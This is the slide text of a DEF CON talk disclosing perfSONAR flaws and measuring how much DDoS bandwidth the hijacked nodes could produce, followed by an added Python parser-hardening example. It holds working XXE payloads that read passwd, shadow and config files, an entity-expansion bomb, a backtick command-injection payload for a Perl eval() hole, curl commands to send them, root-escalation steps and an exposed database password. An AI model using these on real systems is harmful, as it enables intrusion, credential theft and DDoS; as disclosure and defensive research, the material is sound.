ATTACKING NETWORK INFRASTRUCTURE TO GENERATE A 4 TB/S DDOS FOR $5
by Luke Young
$ WHOAMI
➤ Undergraduate Student - Junior
➤ 2nd year at DEF CON
➤ Website: bored.engineer
➤ Email: me@bored.engineer
➤ LinkedIn: https://www.linkedin.com/in/bored-engineer
➤ Twitter: @TheBoredEng
DISCLAIMER
➤ The views and opinions expressed in this presentation are those of
the authors and do not necessarily reflect the official policy or
position of any current or previous employer. Examples of
exploitation performed within this presentation are only examples
and they should not be utilized in the real-world.
AGENDA
➤ What is Internet2?
➤ What is perfSONAR?
➤ Exploiting perfSONAR
➤ Privilege Escalation to root
➤ Enumerating perfSONAR Instances
➤ Code Release and Q&A
BACKSTORY
➤ “The Internet is a global system of interconnected networks. The University
connects to both the global Internet and a number of special research and education
networks commonly referred to as Internet2. These networks provide high
bandwidth connectivity enabling and supporting research collaborations and
educational opportunities regionally, nationally, and around the world.”
WHAT IS INTERNET2?
➤ “Internet2 is an exceptional community of U.S. and international leaders in research,
academia, industry and government who create and collaborate via innovative
technologies. Together, we accelerate research discovery, advance national and global
education, and improve the delivery of public services.”
➤ 282 - Higher Education
➤ 86 - Corporations
➤ 66 - Affiliate members (Governments)
➤ 42 - Regional and State Education Networks
➤ Lookout
➤ Office 365
➤ Rackspace
➤ SoftLayer
➤ Splunk
➤ VMWare
➤ Zoom
➤ AWS
➤ Azure
➤ Box
➤ Dropbox
➤ DocuSign
➤ Duo Security
➤ LastPass
INTERNET2 PRODUCTS
➤ Trust Identity & Middleware
➤ InCommon Federation
➤ Shibboleth
➤ Performance & Analytics
➤ BWCTL - Bandwidth Test Controller
➤ NDT - Network Diagnostic Tool
➤ OWAMP - One-Way Ping
➤ perfSONAR - pS-Performance Toolkit
ATTACKING PERFSONAR
PERFSONAR ISSUE #783
XML EXTERNAL ENTITY PROCESSING (XXE)
<?xml version="1.0"?>
<!DOCTYPE author [
<!ELEMENT author (#PCDATA)>
<!ENTITY ly "Luke Young">
]>
<presentations>
<presentation>
<name>Investigating the Practicality and Cost of Abusing Memory Errors</name>
<location>DEF CON 23</location>
<author>&ly;</author>
</presentation>
<presentation>
<name>Attacking Network Infrastructure to Generate a 4 Tb/s DDoS for $5</name>
<location>DEF CON 24</location>
<author>&ly;</author>
</presentation>
</presentations>
XML EXTERNAL ENTITY PROCESSING (XXE)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
XML EXTERNAL ENTITY PROCESSING (XXE)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
PERFSONAR ISSUE #783 REBORN
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/">
<nmwg:data>
&xxe;
</nmwg:data>
</nmwg:message>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
PERFSONAR ISSUE #783 REBORN
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type="ErrorResponse">
<nmwg:data>root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
...
pulse:x:489:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
admin:x:500:505::/home/admin:/bin/bash
sudo:x:501:506::/home/sudo:/bin/bash
</nmwg:data>
<nmwg:metadata id="return_message">
<nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType>
</nmwg:metadata>
<nmwg:data metadataIdRef="return_message" id="data_return_message">
<nmwgr:datum>Unknown messagetype: </nmwgr:datum>
</nmwg:data>
</nmwg:message>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
curl -X POST -d @passwd.xml http://perfSONAR:8090/
PERFSONAR ISSUE #783 REBORN
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<soapenv:Fault>
<faultcode>soapenv:Server.Internal</faultcode>
<faultstring>Error parsing message: I/O error : Permission denied
I/O error : Permission denied
:1: parser error : Failure to process entity xxe
g:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"&gt; &lt;nmwg:data&gt;
&amp;xxe;
^
:1: parser error : Entity 'xxe' not defined
g:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"&gt; &lt;nmwg:data&gt;
&amp;xxe;
^
at /opt/perfsonar_ps/oppd_mp/bin/oppd.pl line 760
</faultstring>
</soapenv:Fault>
</soapenv:Body>
</soapenv:Envelope>
curl -X POST -d @shadow.xml http://perfSONAR:8090/
PERFSONAR ISSUE #783 REBORN
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type="ErrorResponse">
<nmwg:data>[main]
sql_db_engine = django.db.backends.postgresql_psycopg2
sql_db_name = esmond
sql_db_user = esmond
sql_db_password = 7hc4m1
tsdb_root = %(ESMOND_ROOT)s/tsdb-data
...
</nmwg:data>
<nmwg:metadata id="return_message">
<nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType>
</nmwg:metadata>
<nmwg:data metadataIdRef="return_message" id="data_return_message">
<nmwgr:datum>Unknown messagetype: </nmwgr:datum>
</nmwg:data>
</nmwg:message>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
curl -X POST -d @esmond.xml http://perfSONAR:8090/
PERFSONAR EXPLOITATION
➤ XSS and XXE abundant
➤ RCE seemed impossible
PERFSONAR - BANDWIDTHGRAPH.CGI
foreach my $child (@childnodes) {
    if ( scalar @childnodes == 1 ) {
        if ( $child->textContent =~ m/(E|e)rror/
            || $child->textContent =~ m/Query returned 0 results/ )
        {
            next;
        }
    }
    my %tsresult = ();
    # The throughput attribute comes straight from the remote MA's response
    # and is handed to Perl's string eval(), so the MA controls what runs here.
    my $throughput = eval( $child->getAttribute("throughput") );
    my $eTime = $child->getAttribute("timeValue");
    my $etimestamp;
}
EXPLOITING PERFSONAR
PERFSONAR - BANDWIDTHGRAPH.CGI
<nmwg:data id="data.16870844" metadataIdRef="metadata.7441249" xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/">
<iperf:datum throughput="8.23811e+08" timeType="iso" timeValue="Tue Oct 19 15:18:29.823998065 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
<iperf:datum throughput="8.0573e+08" timeType="iso" timeValue="Tue Oct 19 16:17:55.2163317044 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
<iperf:datum throughput="8.29349e+08" timeType="iso" timeValue="Tue Oct 19 17:17:55.3262506549 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
<iperf:datum throughput="8.24512e+08" timeType="iso" timeValue="Tue Oct 19 18:20:02.81157432 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
<iperf:datum throughput="9.04838e+08" timeType="iso" timeValue="Tue Oct 19 19:17:56.3379084847 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
<iperf:datum throughput="8.16295e+08" timeType="iso" timeValue="Tue Oct 19 22:21:00.284368039 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
<iperf:datum throughput="8.32728e+08" timeType="iso" timeValue="Tue Oct 19 23:17:55.2126511324 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
<iperf:datum throughput="8.18147e+08" timeType="iso" timeValue="Wed Oct 20 04:19:43.2927588221 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
</nmwg:data>
PERFSONAR - BANDWIDTHGRAPH.CGI
my $cgi = new CGI;
my $ma_url = $cgi->param('url');
my $key = $cgi->param('key');
...
if ( !defined $ma_url ) {
print $cgi->header;
my $errmsg = "Missing MA_URL";
my $errfile = HTML::Template->new( filename => "$basetmpldir/bw_error.tmpl" );
$errfile->param( ERRORMSG => $errmsg );
print $errfile->output;
exit(1);
}
...
if ( !defined $key ) {
...
if(!$key){
print $cgi->header;
my $errmsg = "Unable to find matching MA key for provided parameters";
my $errfile = HTML::Template->new( filename => "$basetmpldir/bw_error.tmpl" );
$errfile->param( ERRORMSG => $errmsg );
print $errfile->output;
exit(1);
}
}
PERFSONAR - BANDWIDTHGRAPH.CGI
my $res = &getData( $ma_url, $key, $start, $end );
...
sub getData() {
foreach my $k (@keyList){
my $ma = new perfSONAR_PS::Client::MA( { instance => $ma_url } );
...
my $result = $ma->setupDataRequest(
...
);

...
my @childnodes = $root->findnodes("./*[local-name()='datum']");
...
foreach my $child (@childnodes) {
...
my $throughput = eval( $child->getAttribute("throughput") );
...
}
}
}
PERFSONAR - BANDWIDTHGRAPH.CGI
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" id="message.3046685" type="EchoRequest">
<nmwg:metadata id="metadata.12999789">
<nmwg:eventType>http://schemas.perfsonar.net/tools/admin/echo/2.0</nmwg:eventType>
</nmwg:metadata>
<nmwg:data metadataIdRef="metadata.12999789" id="data.1942969"></nmwg:data>
</nmwg:message>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
PERFSONAR - BANDWIDTHGRAPH.CGI
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/">
<nmwg:metadata id="metadata.1337">
<nmwg:eventType>success.test</nmwg:eventType>
</nmwg:metadata>
<nmwg:data metadataIdRef="metadata.1337">
<iperf:datum throughput="`whoami`" timeValue="1 1 1 1:1:1 1" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
</nmwg:data>
</nmwg:message>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
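Added example, not code from the talk or from the perfSONAR project: a hardened consumer for the NMWG/SOAP messages shown in the XXE slides and in the bandwidthGraph.cgi slides. It refuses any DOCTYPE before the internal subset is read, which stops both the entity-expansion payload and the file:// external-entity payload, and it accepts an iperf datum throughput only when it is a plain numeric literal instead of handing it to eval(). Element and attribute names are the ones on the slides; the sample messages are constructed and the function names are my own.

```python
import re
import xml.parsers.expat as expat
from xml.etree.ElementTree import TreeBuilder

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
NMWG_NS = "http://ggf.org/ns/nmwg/base/2.0/"
IPERF_NS = "http://ggf.org/ns/nmwg/tools/iperf/2.0/"

class UnsafeXML(ValueError):
    """Raised when untrusted input tries to declare a DTD or an entity."""

def _forbid(what):
    # Any expat callback bound to this handler aborts the parse at once.
    def handler(*_args):
        raise UnsafeXML(f"{what} is not allowed in untrusted input")
    return handler

def _fixname(name):
    # expat reports namespaced names as "uri}local"; ElementTree spells them "{uri}local".
    return "{" + name if "}" in name else name

def parse_untrusted(data):
    """Parse XML received from a remote peer into an ElementTree Element.

    A DOCTYPE aborts the parse before its internal subset is read, so neither the
    nested lol1..lol9 entities nor a SYSTEM "file:///etc/passwd" entity is ever
    declared, let alone expanded; the entity handlers are belt and braces."""
    if isinstance(data, str):
        data = data.encode("utf-8")
    builder = TreeBuilder()
    parser = expat.ParserCreate(None, "}")  # "}" switches on namespace processing
    parser.StartDoctypeDeclHandler = _forbid("DOCTYPE")
    parser.EntityDeclHandler = _forbid("entity declaration")
    parser.UnparsedEntityDeclHandler = _forbid("unparsed entity declaration")
    parser.ExternalEntityRefHandler = _forbid("external entity reference")
    parser.StartElementHandler = lambda name, attrs: builder.start(
        _fixname(name), {_fixname(k): v for k, v in attrs.items()})
    parser.EndElementHandler = lambda name: builder.end(_fixname(name))
    parser.CharacterDataHandler = builder.data
    parser.Parse(data, True)
    return builder.close()

def is_rejected(data):
    """True if parse_untrusted() refuses the document as unsafe."""
    try:
        parse_untrusted(data)
    except UnsafeXML:
        return True
    return False

# A plain decimal or floating-point literal such as "8.23811e+08"; nothing else.
_NUMBER = re.compile(r"[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?")

def parse_throughput(raw):
    """Throughput in bit/s as a float, or None when the attribute is not a plain number.

    Replaces eval( $child->getAttribute("throughput") ) in bandwidthGraph.cgi: a value
    such as `whoami` is dropped instead of being handed to the interpreter."""
    if raw is None or not _NUMBER.fullmatch(raw.strip()):
        return None
    return float(raw.strip())

def throughputs_from_message(data):
    """Hardened version of the getData() loop: (timeValue, throughput) for every
    datum element, whatever its namespace, whose throughput is numeric."""
    results = []
    for el in parse_untrusted(data).iter():
        if el.tag.rsplit("}", 1)[-1] != "datum":
            continue
        bps = parse_throughput(el.get("throughput"))
        if bps is not None:
            results.append((el.get("timeValue"), bps))
    return results

# Constructed sample messages modelled on the slides: one MA response carrying a
# genuine datum and the backtick datum, plus the two DTD payloads.
MA_RESPONSE = f"""<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_NS}"><SOAP-ENV:Body>
<nmwg:message xmlns:nmwg="{NMWG_NS}">
<nmwg:data metadataIdRef="metadata.1337">
<iperf:datum throughput="8.23811e+08" timeType="iso" timeValue="Tue Oct 19 15:18:29 UTC 2010" xmlns:iperf="{IPERF_NS}"/>
<iperf:datum throughput="`whoami`" timeValue="1 1 1 1:1:1 1" xmlns:iperf="{IPERF_NS}"/>
</nmwg:data>
</nmwg:message>
</SOAP-ENV:Body></SOAP-ENV:Envelope>"""

XXE_REQUEST = """<?xml version="1.0"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>"""

ENTITY_EXPANSION = """<?xml version="1.0"?>
<!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> ]>
<lolz>&lol1;</lolz>"""
```

Running `throughputs_from_message(MA_RESPONSE)` keeps only the numeric datum, and both DTD payloads are rejected before any entity is declared.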
PERFSONAR - OBTAINING ROOT
PERFSONAR - ROOT?
PERFSONAR - CONFIGMANAGER
➤ /etc/hosts
➤ /etc/ntp.conf
➤ /etc/ntp/step-tickers
➤ /etc/bwctld/bwctld.conf
➤ /etc/bwctld/bwctld.limits
➤ /etc/owampd/owampd.limits
➤ /usr/ndt/tcpbw100.html
➤ /opt/perfsonar_ps/ls_registration_daemon/etc/ls_registration_daemon.conf
➤ /opt/perfsonar_ps/regular_testing/etc/regular_testing.conf
➤ /opt/perfsonar_ps/toolkit/etc/administrative_info
➤ /opt/perfsonar_ps/toolkit/etc/enabled_services
➤ /opt/perfsonar_ps/toolkit/etc/external_addresses
➤ /opt/perfsonar_ps/toolkit/etc/ntp_known_servers
PERFSONAR - CONFIGMANAGER
➤ Backup original bwctld.conf
➤ Use ConfigManager to stop bwctld
➤ Write executable posthook.pl
➤ Use ConfigManager to write new bwctld.conf
➤ Use ConfigManager to start bwctld
PERFSONAR - CONFIGMANAGER
➤ Trigger a bwctl session, triggering posthook.pl as root
➤ Use ConfigManager to stop bwctld
➤ Remove posthook.pl
➤ Restore original bwctld.conf
➤ Use ConfigManager to start bwctld back to original configuration
ENUMERATING PERFSONAR INSTANCES
ESTIMATING THE PERFSONAR NETWORK CAPACITY
PERFSONAR NETWORK MAPPING
MAP.GO / PS-SPLUNK
PERFSONAR NETWORK SUMMARY
➤ 970 Publicly routable nodes
➤ 12.51 TB of RAM
➤ 29.85 THz CPU Cycles
➤ Average Node:
➤ 13 GB of RAM
➤ 12 Cores at 2.6 GHz
PERFSONAR THEORETICAL NETWORK SPEED
5.719 Tb/s
CALCULATING ACTUAL NETWORK SPEED
➤ Enumerate all perfSONAR instances and their maximum interface speed
➤ Calculate instance location from GeoIP
➤ Match 5 closest instances of same or faster interface speed
CALCULATING ACTUAL NETWORK SPEED
➤ index=ps sourcetype=ps-summary
  | dedup ls_client_uuid
  | rename external_address.address as address, external_address.speed as speed, services{}.enabled as enabled
  | where mvindex(enabled,0)="1"
  | fillnull value=10000000000 speed
  | iplocation address
  | map maxsearches=100000 search="search index=ps sourcetype=ps-summary
      | dedup ls_client_uuid
      | rename services{}.enabled as peer_enabled
      | eval peer_enabled = mvindex(peer_enabled,0)
      | where peer_enabled="1"
      | eval address=$address$, speed=$speed$
      | rename external_address.address as peer_address, external_address.speed as peer_speed
      | fillnull value=10000000000 peer_speed
      | where peer_address!=address AND peer_speed >= speed
      | eval lat=$lat$, lon=$lon$
      | iplocation prefix=peer_ peer_address
      | eval distance=sqrt(pow(lat-peer_lat,2)+pow(lon-peer_lon,2))
      | where distance!=0
      | sort distance
      | head 5
      | fields address, speed, peer_address, peer_speed, distance"
  | table address, speed, peer_address, peer_speed, distance
CALCULATING ACTUAL NETWORK SPEED
➤ Never run 2 tests with the same instance at the same time
➤ Never run more than 10 tests at the same time
➤ Never test a host that doesn’t have bwctl enabled
PERFSONAR ACTUAL NETWORK SPEED
3.703 Tb/s
LIVE DEMO
CONCLUSION
➤ oppd (XXE) - unresolved
➤ bandwidthGraph.cgi (RCE) - fixed by perfSONAR 3.5.1 on March 3rd
➤ ConfigDaemon (PrivEsc) - unresolved
CONCLUSION
➤ GitHub: http://www.github.com/bored-engineer
➤ Email: me@bored.engineer
➤ LinkedIn: https://www.linkedin.com/in/bored-engineer
➤ Twitter: @TheBoredEng

More Related Content

Similar to Attacking Network Infrastructure to Generate a 4 Tbs DDoS

Reversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detectionReversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detection
Rodrigo Montoro
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
Graham Charters
 
Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020
Timothy Spann
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualization
ssusercb4686
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
guest3379bd
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
Fedir RYKHTIK
 
HARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVERHARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVER
Utah Networxs Consultoria e Treinamento
 
Incrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern AutomationIncrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern Automation
Sean Chittenden
 
Terraform in action
Terraform in actionTerraform in action
Terraform in action
Damien Pacaud
 
JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012
Bharti Gupta
 
PPT
PPTPPT
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Puppet
 
Tips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software EngineeringTips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software Engineering
jtdudley
 
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Docker, Inc.
 
Ten practical ways to improve front-end performance
Ten practical ways to improve front-end performanceTen practical ways to improve front-end performance
Ten practical ways to improve front-end performance
Andrew Rota
 
Anomaly Detection at Scale
Anomaly Detection at ScaleAnomaly Detection at Scale
Anomaly Detection at Scale
Jeff Henrikson
 
Linked Data Tutorial
Linked Data TutorialLinked Data Tutorial
Linked Data Tutorial
Michael Hausenblas
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a Fox
C4Media
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
Stefano Maccaglia
 
Information Retrieval and Extraction
Information Retrieval and ExtractionInformation Retrieval and Extraction
Information Retrieval and Extraction
Christopher Frenz
 

Similar to Attacking Network Infrastructure to Generate a 4 Tbs DDoS (20)

Reversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detectionReversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detection
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
 
Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualization
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 
HARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVERHARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVER
 
Incrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern AutomationIncrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern Automation
 
Terraform in action
Terraform in actionTerraform in action
Terraform in action
 
JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012
 
PPT
PPTPPT
PPT
 
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
 
Tips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software EngineeringTips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software Engineering
 
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
 
Ten practical ways to improve front-end performance
Ten practical ways to improve front-end performanceTen practical ways to improve front-end performance
Ten practical ways to improve front-end performance
 
Anomaly Detection at Scale
Anomaly Detection at ScaleAnomaly Detection at Scale
Anomaly Detection at Scale
 
Linked Data Tutorial
Linked Data TutorialLinked Data Tutorial
Linked Data Tutorial
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a Fox
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
 
Information Retrieval and Extraction
Information Retrieval and ExtractionInformation Retrieval and Extraction
Information Retrieval and Extraction
 

More from mark-smith

How Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security ProblemHow Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security Problem
mark-smith
 
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the SandboxRemotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
mark-smith
 
Applied Machine Learning for Data exfil and other fun topics
Applied Machine Learning for Data exfil and other fun topicsApplied Machine Learning for Data exfil and other fun topics
Applied Machine Learning for Data exfil and other fun topics
mark-smith
 
JailBreak DIY- Fried Apple
JailBreak DIY- Fried AppleJailBreak DIY- Fried Apple
JailBreak DIY- Fried Apple
mark-smith
 
The linux kernel hidden inside windows 10
The linux kernel hidden inside windows 10The linux kernel hidden inside windows 10
The linux kernel hidden inside windows 10
mark-smith
 
Exploiting Curiosity and Context
Exploiting Curiosity and ContextExploiting Curiosity and Context
Exploiting Curiosity and Context
mark-smith
 
Abusing belkin home automation devices
Abusing belkin home automation devicesAbusing belkin home automation devices
Abusing belkin home automation devices
mark-smith
 
Greed for Fame Benefits Large Scale Botnets
Greed for Fame Benefits Large Scale BotnetsGreed for Fame Benefits Large Scale Botnets
Greed for Fame Benefits Large Scale Botnets
mark-smith
 
How your smartphone cpu breaks software level security and privacy
How your smartphone cpu breaks software level security and privacyHow your smartphone cpu breaks software level security and privacy
How your smartphone cpu breaks software level security and privacy
mark-smith
 
How to Make People Click on a Dangerous Link Despite their Security Awareness
How to Make People Click on a Dangerous Link Despite their Security Awareness How to Make People Click on a Dangerous Link Despite their Security Awareness
How to Make People Click on a Dangerous Link Despite their Security Awareness
mark-smith
 
Technologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible CyberspaceTechnologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible Cyberspace
mark-smith
 
Technologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible CyberspaceTechnologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible Cyberspace
mark-smith
 

More from mark-smith (12)

How Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security ProblemHow Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security Problem
 
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
